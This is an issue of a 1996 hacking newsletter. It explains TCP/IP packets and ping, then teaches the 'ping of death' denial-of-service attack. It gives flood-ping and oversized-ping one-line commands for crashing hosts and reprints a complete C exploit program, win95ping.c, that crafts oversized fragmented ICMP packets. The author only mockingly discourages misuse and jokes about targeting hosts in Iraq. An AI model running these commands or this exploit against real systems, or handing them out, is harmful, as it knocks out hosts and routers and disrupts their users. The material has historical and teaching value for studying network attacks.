GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 3
Introduction
to TCP/IP. That means packets! Datagrams! Ping oversize
packet denial of service exploit explained. But this hack is
a lot less mostly harmless than most. Don't try this at home...
____________________________________________________________
If you have been on the Happy Hacker list for awhile, you've
been getting some items forwarded from the Bugtraq list on a
new ping packet exploit.
Now if this has been sounding like gibberish to you, relax.
It is really very simple. In fact, it is so simple that if you
use Windows 95, by the time you finish this article you
will know a simple, one-line command that you could use to crash
many Internet hosts and routers.
*************************************************
YOU CAN GO TO JAIL WARNING: This time I'm not going to implore
the wannabe evil genius types on this list to be virtuous and
resist the temptation to misuse the information I'm about to
give them. See if I care! If one of those guys gets caught crashing
thousands of Internet hosts and routers, not only will they go
to jail and get a big fine. We'll all think he or she is a dork.
This exploit is a no-brainer, one-line command from Windows 95.
Yeah, the operating system that is designed for clueless morons.
So there is nothing elite about this hack. What is elite is being
able to thwart this attack.
**************************************************
**************************************************
NEWBIE NOTE: If packets, datagrams, and TCP/IP aren't exactly
your bosom buddies yet, believe me, you need to really get in
bed with them in order to call yourself a hacker. So hang in
here for some technical stuff. When we are done, you'll have
the satisfaction of knowing you could wreak havoc on the Internet,
but are too elite to do so.
A packet is a way to send information electronically that
keeps out errors. The idea is that no transmission technology
is perfect. Have you ever played the game "telephone"?
You get a dozen or so people in a circle and the first person
whispers a message to the second. Something like "The bun
is the lowest form of wheat." The second person whispers
to the third, "A bum is the lowest form of cheating."
The third whispers, "Rum is the lowest form of drinking."
And so on. It's really fun to find out how far the message can
mutate as it goes around the circle.
But when, for example, you get email, you would prefer that
it isn't messed up. So the computer that sends the email breaks
it up into little pieces called datagrams. Then it wraps things
around each datagram that tell what computer it needs to go to,
where it came from, and that check whether the datagram might
have been garbled. These wrapped up datagram packages are called
"packets."
(Note:
this explanation of datagrams and packets has sent the bad attitude
"hacker" community into a tizzy. You probably can still
find flames about this at Brian Martin's Attrition.org web site. The reason Martin and Michael
Schiffmann think the "payload" of a packet can't be
called a datagram is that Martin and his buddies are deficient
in their education. To be blunt, they learned about computers
in the back alleys of the Internet instead of by studying computer
science. )
Now if the computer sending email to you were to package a
really long message into just one packet, chances are pretty
high that it will get messed up while on its way to the other
computer. Bit burps. So when the receiving computer checks the
packet and finds that it got messed up, it will throw it away
and tell the other computer to send it again. It could take a
long time until this giant packet gets through intact.
But if the message is broken into a lot of little pieces and
wrapped up into bunches of packets, most of them will be good
and the receiving computer will keep them. It will then tell
the sending computer to retransmit just the packets that messed
up. Then when all the pieces finally get there, the receiving
computer puts them together in the right order and lo and behold,
there is the complete, error-free email.
TCP/IP stands for Transmission Control Protocol/Internet Protocol.
It tells computers that are hooked up to the Internet how to
package up messages into packets and how to read packets these
packets from other computers. Ping uses TCP/IP to make its packets.
**********************************************
"Ping" is a command that sends a feeler out from
your computer to another computer to see if it is turned on and
hooked to the same network you are on. On the Internet there
are some ten million computers that you can ping.
Ping is a command you can give, for example, from the Unix,
Windows 95 and Windows NT operating systems. It is part of the
Internet Control Message Protocol (ICMP), which is used to troubleshoot
TCP/IP networks. What it does is tell a remote computer to echo
back a ping. So if you get your ping
back, you know that computer is alive. Furthermore, some forms
of the ping command will also tell you how long it takes for
a message to go out to that computer and come back again.
But how does your computer know that the ping it just sent
out actually echoed back from the targeted computer? The datagram
is the answer. The ping sent out a datagram. If the returning
ping holds this same datagram, you know it was your ping that
just echoed back.
The basic format of this command is simply:
ping hostname
where "hostname" is the Internet address of the
computer you want to check out.
When I give this command from Sun Release 4.1 Unix, I get
the answer "hostname is alive."
**************************************
TECHNICAL TIP: Because of the destructive powers of ping, many
Internet Service Providers hide the ping program in their shell
accounts where clueless newbies can't get their hands on it.
If your shell account says "command not found" when
you enter the ping command, try:
/usr/etc/ping hostname
If this doesn't work, either try the command “whereis
ping” or complain to your ISP's tech support. They may have
ddiabled ping for ordinary users, but if you convince tech support
you are a good Internet citizen they may let you use it.
***************************************
****************************************
NEWBIE NOTE: You say you can't find a way to ping from your on-line
service? That may be because you don't have a shell account.
But there is one thing you really need in order to hack: A SHELL
ACCOUNT!!!!
The reason hackers make fun of people with America Online
accounts is because that ISP doesn't give out shell accounts.
This is because America Online wants you to be good boys and
girls and not hack!
A "shell account" is an Internet account in which
your computer becomes a terminal of one of your ISP's host
computers. Once you are in the "shell" you can give
commands to the operating system (which is usually Unix) just
like you were sitting there at the console of one of your ISP's
hosts.
You may already have a shell account but just not know how
to log on to it. Call tech support with your ISP to find
out whether you have one, and how to get on it.
***************************************
There are all sorts of fancy variations on the ping command.
And, guess what, whenever there is a command you give over the
Internet that has lots of variations, you can just about count
on there being something hackable in there. Muhahaha!
The flood ping is a simple example. If your operating system
will let you get away with giving the command:
-> ping -f hostname
it sends out a veritable flood of pings, as fast as your ISP's
host machine can make them. This keeps the host you've targeted
so busy echoing back your pings that it can do little else. It
also puts a heavy load on the network.
Hackers with primitive skill levels will sometimes get together
and use several of their computers at once to simultaneously
ping some victim's Internet host computer. This will generally
keep the victim's computer too
busy to do anything else. It may even crash. However, the down
side (from the attackers' viewpoint) is that it keeps the attackers'
computers tied up, too.
**************************************
NETIQUETTE NOTE: Flood pinging a computer is extremely rude.
Get caught doing this and you will be lucky if the worst that
happens is your on-line service provider closes your account.
Do this to a serious hacker and you may need an identity transplant.
If you should start a flood ping kind of by accident, you
can shut it off by holding down the control key and pressing
"c" (control-c).
**************************************
*************************************
EVIL GENIUS TIP: Ping yourself! If you are using some sort of
Unix, your operating system will let you use your computer to
do just about anything to itself that it can do to other computers.
The network address that takes you
back to your own host computer is localhost (or 127.0.0.1). Here's
an example of how I use localhost:
<slug> [65] ->telnet localhost
Trying 127.0.0.1 ...
Connected to localhost.
Escape character is '^]'.
SunOS UNIX (slug)
login:
See, I'm back to the login sequence for the computer named
"slug" all over
again.
Now I ping myself:
<llama> [68] ->/usr/etc/ping localhost
localhost is alive
This gives the same result as if I were to command:
<llama> [69] ->/usr/etc/ping llama
llama.swcp.com is alive
****************************************
*****************************************
MUHAHAHA TIP: Want to yank someone's chain? Tell him to ftp to
127.0.0.1 and log in using his or her own user name and password
for kewl warez! My ex-husband Keith Henson did that to the Church
of Scientology. The COGs ftp-ed to 127.0.0.1 and discovered all
their copyrighted scriptures. They assumed this was on Keith's
computer, not theirs. They were *so* sure he had their scriptures
that they took him to court. The judge, when he realized they
were simply looping back to their own computer, literally laughed
them out of court.
For a hilarious transcript or audio tape of this infamous
court session, email hkhenson@cup.portal.com. That's Keith's
email address. My hat is off to a superb hacker!
*******************************************
However, the oversize ping packet exploit you are about to
learn will do even more damage to some hosts than a gang of flood
ping conspirators. And it will do it without tying up the attackers'
computer for any longer than the split second it takes to send
out just one ping.
(Note: This won't
work on Windows 98, and won't work across the Internet. You have
to be on a local area network to use "killer ping.")
The easiest way to do this hack is to run Windows 95. Don't
have it? You can generally find a El Cheapo store that will sell
it to you for $99.
To do this, first set up your Windows 95 system so that you
can make a PPP or SLIP connection with the Internet using the
Dialup Networking program under the My Computer icon. You may
need some help from your ISP tech support in setting this up.
You must do it this way or this hack won't work. Your America
Online dialer *definitely* will not work.
************************************
NEWBIE NOTE: If your Internet connection allows you to run a
Web browser that shows pictures, you can use that dialup number
with your Windows 95 Dialup Networking program to get either
a PPP or SLIP connection.
************************************
Next, get your computer connected to the Internet. But don't
run a browser or anything. Instead, once your Dialup Networking
program tell you that you have a connection, click on the "Start"
button and go to the listing "MS-DOS." Open this DOS
window. You'll get a prompt:
C:\windows\>
Now let's first do this the good citizen way. At this prompt
you can type in a plain ordinary "ping" command:
C:\windows\ping
hostname
where "hostname" is the address of some Internet
computer. For example, you could ping thales.nmia.com, which
is one of my favorite computers, named after an obscure Greek
philosopher.
Now if you happened to know the address of one of Saddam Hussein's
computers, however, you might want to give the command:
c:\windows\ping -l 65510 saddam_hussein's.computer.mil
Now don't really do this to a real computer! Some, but not
all, computers will crash and either remain hung or reboot when
they get this ping. Others will continue working cheerily along,
and then suddenly go under hours later.
Why? That extra added -l 65510 creates a giant datagram for
the ping packet. Some computers, when asked to send back an identical
datagram, get really messed up.
If you want all the gory details on this ping exploit, including
how to protect your computers from it, check out
http://www.sophist.demon.co.uk/ping.
Now there are other ways to manufacture a giant ping datagram
besides using Windows 95. For example, if you run certain FreeBSD
or Linux versions of Unix on your PC, you can run this program,
which was posted to the Bugtraq list.
From: Bill Fenner <fenner@freefall.freebsd.org>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
Subject: Ping exploit program
Since some people don't necessarily have Windows '95 boxes lying
around, I (Fenner) wrote the following exploit program.
It requires a raw socket layer that doesn't mess with the packet,
so BSD 4.3, SunOS and Solaris are
out. It works fine on 4.4BSD systems. It should work on
Linux if you compile with -DREALLY_RAW.
Feel free to do with this what you want. Please use this
tool only to test your own machines, and not to crash others'.
* win95ping.c
*
* Simulate the evil win95 "ping -l 65510 buggyhost".
* version 1.0 Bill Fenner <fenner@freebsd.org> 22-Oct-1996
*
* This requires raw sockets that don't mess with the packet
at all (other
* than adding the checksum). That means that SunOS,
Solaris, and
* BSD4.3-based systems are out. BSD4.4 systems (FreeBSD,
NetBSD,
* OpenBSD, BSDI) will work. Linux might work, I don't
have a Linux
* system to try it on.
*
* The attack from the Win95 box looks like:
* 17:26:11.013622 cslwin95 > arkroyal: icmp: echo request
(frag 6144:1480@0+)
* 17:26:11.015079 cslwin95 > arkroyal: (frag 6144:1480@1480+)
* 17:26:11.016637 cslwin95 > arkroyal: (frag 6144:1480@2960+)
* 17:26:11.017577 cslwin95 > arkroyal: (frag 6144:1480@4440+)
* 17:26:11.018833 cslwin95 > arkroyal: (frag 6144:1480@5920+)
* 17:26:11.020112 cslwin95 > arkroyal: (frag 6144:1480@7400+)
* 17:26:11.021346 cslwin95 > arkroyal: (frag 6144:1480@8880+
* 17:26:11.022641 cslwin95 > arkroyal: (frag 6144:1480@10360+)
* 17:26:11.023869 cslwin95 > arkroyal: (frag 6144:1480@11840+)
* 17:26:11.025140 cslwin95 > arkroyal: (frag 6144:1480@13320+)
* 17:26:11.026604 cslwin95 > arkroyal: (frag 6144:1480@14800+)
* 17:26:11.027628 cslwin95 > arkroyal: (frag 6144:1480@16280+)
* 17:26:11.028871 cslwin95 > arkroyal: (frag 6144:1480@17760+)
* 17:26:11.030100 cslwin95 > arkroyal: (frag 6144:1480@19240+)
* 17:26:11.031307 cslwin95 > arkroyal: (frag 6144:1480@20720+)
* 17:26:11.032542 cslwin95 > arkroyal: (frag 6144:1480@22200+)
* 17:26:11.033774 cslwin95 > arkroyal: (frag 6144:1480@23680+)
* 17:26:11.035018 cslwin95 > arkroyal: (frag 6144:1480@25160+)
* 17:26:11.036576 cslwin95 > arkroyal: (frag 6144:1480@26640+)
* 17:26:11.037464 cslwin95 > arkroyal: (frag 6144:1480@28120+)
* 17:26:11.038696 cslwin95 > arkroyal: (frag 6144:1480@29600+)
* 17:26:11.039966 cslwin95 > arkroyal: (frag 6144:1480@31080+)
* 17:26:11.041218 cslwin95 > arkroyal: (frag 6144:1480@32560+)
* 17:26:11.042579 cslwin95 > arkroyal: (frag 6144:1480@34040+)
* 17:26:11.043807 cslwin95 > arkroyal: (frag 6144:1480@35520+)
* 17:26:11.046276 cslwin95 > arkroyal: (frag 6144:1480@37000+)
* 17:26:11.047236 cslwin95 > arkroyal: (frag 6144:1480@38480+)
* 17:26:11.048478 cslwin95 > arkroyal: (frag 6144:1480@39960+)
* 17:26:11.049698 cslwin95 > arkroyal: (frag 6144:1480@41440+)
* 17:26:11.050929 cslwin95 > arkroyal: (frag 6144:1480@42920+)
* 17:26:11.052164 cslwin95 > arkroyal: (frag 6144:1480@44400+)
* 17:26:11.053398 cslwin95 > arkroyal: (frag 6144:1480@45880+)
* 17:26:11.054685 cslwin95 > arkroyal: (frag 6144:1480@47360+)
* 17:26:11.056347 cslwin95 > arkroyal: (frag 6144:1480@48840+)
* 17:26:11.057313 cslwin95 > arkroyal: (frag 6144:1480@50320+)
* 17:26:11.058357 cslwin95 > arkroyal: (frag 6144:1480@51800+)
* 17:26:11.059588 cslwin95 > arkroyal: (frag 6144:1480@53280+)
* 17:26:11.060787 cslwin95 > arkroyal: (frag 6144:1480@54760+)
* 17:26:11.062023 cslwin95 > arkroyal: (frag 6144:1480@56240+)
* 17:26:11.063247 cslwin95 > arkroyal: (frag 6144:1480@57720+)
* 17:26:11.064479 cslwin95 > arkroyal: (frag 6144:1480@59200+)
* 17:26:11.066252 cslwin95 > arkroyal: (frag 6144:1480@60680+)
* 17:26:11.066957 cslwin95 > arkroyal: (frag 6144:1480@62160+)
* 17:26:11.068220 cslwin95 > arkroyal: (frag 6144:1480@63640+)
* 17:26:11.069107 cslwin95 > arkroyal: (frag 6144:398@65120)
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
/*
* If your kernel doesn't muck with raw packets, #define
REALLY_RAW.
* This is probably only Linux.
*/
#ifdef REALLY_RAW
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
int
main(int argc, char **argv)
{
int s;
char buf[1500];
struct ip *ip = (struct
ip *)buf;
struct icmp *icmp
= (struct icmp *)(ip + 1);
struct hostent *hp;
struct sockaddr_in
dst;
int offset;
int on = 1;
bzero(buf, sizeof
buf);
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {
perror("socket");
exit(1);
}
if (setsockopt(s,
IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
perror("IP_HDRINCL");
exit(1);
}
if (argc != 2) {
fprintf(stderr, "usage: %s hostname\n", argv[0]);
exit(1);
}
if ((hp = gethostbyname(argv[1]))
== NULL) {
if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {
fprintf(stderr, "%s: unknown host\n", argv[1]);
}
} else {
bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
}
printf("Sending
to %s\n", inet_ntoa(ip->ip_dst));
ip->ip_v = 4;
ip->ip_hl = sizeof
*ip >> 2;
ip->ip_tos = 0;
ip->ip_len = FIX(sizeof
buf);
ip->ip_id = htons(4321);
ip->ip_off = FIX(0);
ip->ip_ttl = 255;
ip->ip_p = 1;
ip->ip_sum = 0;
/* kernel fills in */
ip->ip_src.s_addr
= 0; /*
kernel fills in */
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;
icmp->icmp_type
= ICMP_ECHO;
icmp->icmp_code
= 0;
icmp->icmp_cksum
= htons(~(ICMP_ECHO << 8));
/* the checksum of all 0's is easy to compute */
for (offset = 0;
offset < 65536; offset += (sizeof buf - sizeof *ip)) {
ip->ip_off = FIX(offset >> 3);
if (offset < 65120)
ip->ip_off |= FIX(IP_MF);
else
ip->ip_len = FIX(418); /* make total 65538 */
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
sizeof dst) < 0) {
fprintf(stderr, "offset %d: ", offset);
perror("sendto");
}
if (offset == 0) {
icmp->icmp_type = 0;
icmp->icmp_code = 0;
icmp->icmp_cksum = 0;
}
}
}
(End of Fenner's ping exploit message.)
********************************************
YOU CAN GO TO JAIL NOTE: Not only is this hack not elite, if
you are reading this you don't know enough to keep from getting
busted from doing this ping hack. On the other hand, if you were
to do it to an Internet host in Iraq...
********************************************
Of course there are many other kewl things you can do with
ping. If you have a shell account, you can find out lots of stuph
about ping by giving the command:
man ping
In fact, you can get lots of details on any Unix command with
"man."
Have fun with ping -- and be good! But remember, I'm not begging
the evil genius wannabes to be good. See if I care when you get
busted...
_________________________________________________________
To send me confidential email (please, no discussions of illegal
activities) use . Please direct flames to
dev/null@cmeinel.com. Happy hacking!
© 1996 Carolyn P. Meinel. You may forward the GUIDE TO
(mostly) HARMLESS HACKING as long as you leave this notice at
the end..
________________________________________________________
